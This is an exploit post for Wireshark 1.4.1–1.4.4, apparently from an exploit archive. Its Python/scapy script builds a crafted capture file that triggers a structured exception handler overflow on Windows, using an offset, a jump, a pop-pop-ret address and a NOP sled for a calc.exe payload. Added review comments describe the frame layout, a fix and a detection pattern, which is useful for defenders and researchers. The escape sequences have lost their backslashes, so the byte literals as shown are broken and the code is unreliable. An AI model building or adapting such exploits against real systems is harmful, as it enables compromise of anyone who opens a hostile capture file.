
Wireshark 1.4.4 SEH Overflow

Posted on 19 April 2011

#!/usr/bin/env python
# Vulnerable app: Wireshark 1.4.1-1.4.4
# Author: sickness
# Download :
# OS: Tested it on Windows XP SP2 and SP3 but it should work on every Windows with DEP off (still working on a ROP exploit)
# DATE : 17.04.2011
# Fixed in latest version 1.4.5
# DO NOT FORGET TO FEEL THE PWNSAUCE WITH: http://redmine.corelan.be:8800/projects/pvefindaddr
###################################################################
# Offset might change!
# Watch out for other bad chars!!
# Current bad chars: x00x0ax0dx09
###################################################################
# References:
# https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836
# https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838
###################################################################
# NOTE(review): this is a proof-of-concept generator, not a network tool — it
# writes a single crafted frame to a capture file (evil.pcap) that, per the
# header above, crashes the affected Wireshark versions when the file is
# opened. Mitigation per the header: the fix shipped in 1.4.5; until upgraded,
# treat capture files from untrusted sources as hostile input.
# Python 2 syntax (print statements); scapy is a third-party dependency.
# The escape sequences in this listing have lost their backslashes (e.g.
# "x41" rather than "\x41"), most likely extraction damage — the literals
# below are therefore plain ASCII text, not the byte values the header
# comments describe.
import sys  # imported but not used anywhere in this script
from scapy.all import *
#payload=calc.exe
#ppr is from a non-ASLR enabled wireshark module
# Frame layout: one Ethernet frame with an uncommon EtherType (0x2323); the
# payload is 1239 bytes of filler, a 4-byte fragment, the 4-byte "ppr" address
# named in the comment above, 16 bytes of filler, the (redacted) payload, and
# a 4500-byte filler tail — roughly 5.7 KB plus the payload.
# Detection angle: a capture holding a frame of this size with EtherType 0x2323
# and a payload dominated by repeated single-byte filler is a strong indicator
# of this PoC.
evil = Ether(type=0x2323)/("x41" * 1239 + "xebx06x90x90" + "x5Dx10x94x62" + "x90" * 16 + "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" + "x90" * 4500)
# Writes the frame to evil.pcap in the current working directory (overwrites
# silently if the file exists).
wrpcap("evil.pcap",evil)
print " "
print "Evil .pcap file created!"
print "It's pwnsauce time! "

 
